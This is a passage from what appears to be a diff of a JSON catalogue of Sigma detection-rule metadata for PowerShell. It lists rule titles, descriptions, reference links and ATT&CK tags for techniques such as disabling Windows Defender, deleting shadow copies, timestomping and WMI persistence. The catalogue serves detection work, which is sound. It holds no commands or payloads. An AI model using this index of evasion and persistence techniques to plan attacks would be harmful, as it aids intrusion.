user.", - "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", - "value": "Suspicious New-PSDrive to Admin Share", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2022/08/13", - "filename": "posh_ps_susp_new_psdrive.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", - "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", - "value": "Suspicious TCP Tunnel Via PowerShell Script", - "meta": { - "refs": [ - "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/07/08", - "filename": "posh_ps_susp_proxy_scripts.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "value": "Recon Information for Export with PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ], - "creation_date": "2021/07/30", - "filename": "posh_ps_susp_recon_export.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", - "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", - "value": "Remove Account From Domain Admin Group", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ], - "creation_date": "2021/12/26", - "filename": "posh_ps_susp_remove_adgroupmember.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "uuid": "22d80745-6f2c-46da-826b-77adaededd74", - "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "meta": { - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2022/10/24", - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare intended use of hidden services", - "Rare FP could occure due to the non linearity of the ScriptBlockText log" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", - "value": "Suspicious Get Information for SMB Share", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/15", - "filename": "posh_ps_susp_smb_share_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", - "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", - "value": "Suspicious SSL Connection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", - "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ], - "creation_date": "2022/01/23", - "filename": "posh_ps_susp_ssl_keyword.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Powershell use PassThru option to start in background", - "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", - "value": "Suspicious Start-Process PassThru", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003" - ], - "creation_date": "2022/01/15", - "filename": "posh_ps_susp_start_process.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", - "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", - "value": "Suspicious Unblock-File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ], - "creation_date": "2022/02/01", - "filename": "posh_ps_susp_unblock_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", - "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", - "value": "Replace Desktop Wallpaper by Powershell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" - ], - "tags": [ - "attack.impact", - "attack.t1491.001" - ], - "creation_date": "2021/12/26", - "filename": "posh_ps_susp_wallpaper.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", - "uuid": "b26647de-4feb-4283-af6b-6117661283c5", - "value": "Powershell Suspicious Win32_PnPEntity", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1120" - ], - "creation_date": "2021/08/23", - "filename": "posh_ps_susp_win32_pnpentity.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Admin script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/12/26", - "filename": "posh_ps_susp_win32_shadowcopy.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2022/09/20", - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", - "value": "Suspicious PowerShell WindowStyle Option", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.003" - ], - "creation_date": "2021/10/20", - "filename": "posh_ps_susp_windowstyle.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", - "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", - "value": "PowerShell Write-EventLog Usage", - "meta": { - "refs": [ - "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/16", - "filename": "posh_ps_susp_write_eventlog.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ], - "creation_date": "2021/07/20", - "filename": "posh_ps_susp_zip_compress.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", - "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/05", - "filename": "posh_ps_syncappvpublishingserver_exe.yml", - "author": "Ensar \u015eamil, @sblmsrsn, OSCD Community", - "level": "medium", - "falsepositive": [ - "App-V clients" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "value": "Tamper Windows Defender - ScriptBlockLogging", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/01/16", - "filename": "posh_ps_tamper_defender.yml", - "author": "frack113, elhoim", - "level": "high", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", - "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "meta": { - "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/05", - "filename": "posh_ps_tamper_defender_remove_mppreference.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", - "value": "Testing Usage of Uncommonly Used Port", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", - "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1571" - ], - "creation_date": "2022/01/23", - "filename": "posh_ps_test_netconnection.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", - "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", - "value": "Powershell Timestomp", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://www.offensive-security.com/metasploit-unleashed/timestomp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ], - "creation_date": "2021/08/03", - "filename": "posh_ps_timestomp.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", - "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "value": "Powershell Trigger Profiles by Add_Content", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" - ], - "creation_date": "2021/08/18", - "filename": "posh_ps_trigger_profiles.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", - "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", - "value": "Windows PowerShell Upload Web Request", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", - "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ], - "creation_date": "2022/01/07", - "filename": "posh_ps_upload.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", - "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "meta": { - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": "2022/11/17", - "filename": "posh_ps_user_discovery_get_aduser.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "meta": { - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2022/10/17", - "filename": "posh_ps_using_set_service_to_hide_services.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare intended use of hidden services", - "Rare FP could occure due to the non linearity of the ScriptBlockText log" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", - "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", - "value": "Usage Of Web Request Commands And Cmdlets - PowerShell", - "meta": { - "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/24", - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", - "author": "James Pemberton / @4A616D6573", - "level": "medium", - "falsepositive": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", - "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", - "value": "PowerShell WMI Win32_Product Install MSI", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/04/24", - "filename": "posh_ps_win32_product_install_msi.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", - "value": "Windows Firewall Profile Disabled", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", - "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", - "http://woshub.com/manage-windows-firewall-powershell/", - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2021/10/12", - "filename": "posh_ps_windows_firewall_profile_disabled.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", - "value": "Winlogon Helper DLL", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ], - "creation_date": "2019/10/21", - "filename": "posh_ps_winlogon_helper_dll.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", - "value": "Windows Defender Exclusions Added - PowerShell", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/09/16", - "filename": "posh_ps_win_defender_exclusions_added.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects parameters used by WMImplant", - "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", - "value": "WMImplant Hack Tool", - "meta": { - "refs": [ - "https://github.com/FortyNorthSecurity/WMImplant", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "creation_date": "2020/03/26", - "filename": "posh_ps_wmimplant.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Administrative scripts that use the same keywords." - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", - "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", - "value": "Powershell WMI Persistence", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.003" - ], - "creation_date": "2021/08/19", - "filename": "posh_ps_wmi_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", - "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", - "value": "WMIC Unquoted Services Path Lookup - PowerShell", - "meta": { - "refs": [ - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/06/20", - "filename": "posh_ps_wmi_unquoted_service_search.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", - "value": "Powershell XML Execute Command", - "meta": { - "refs": [ - 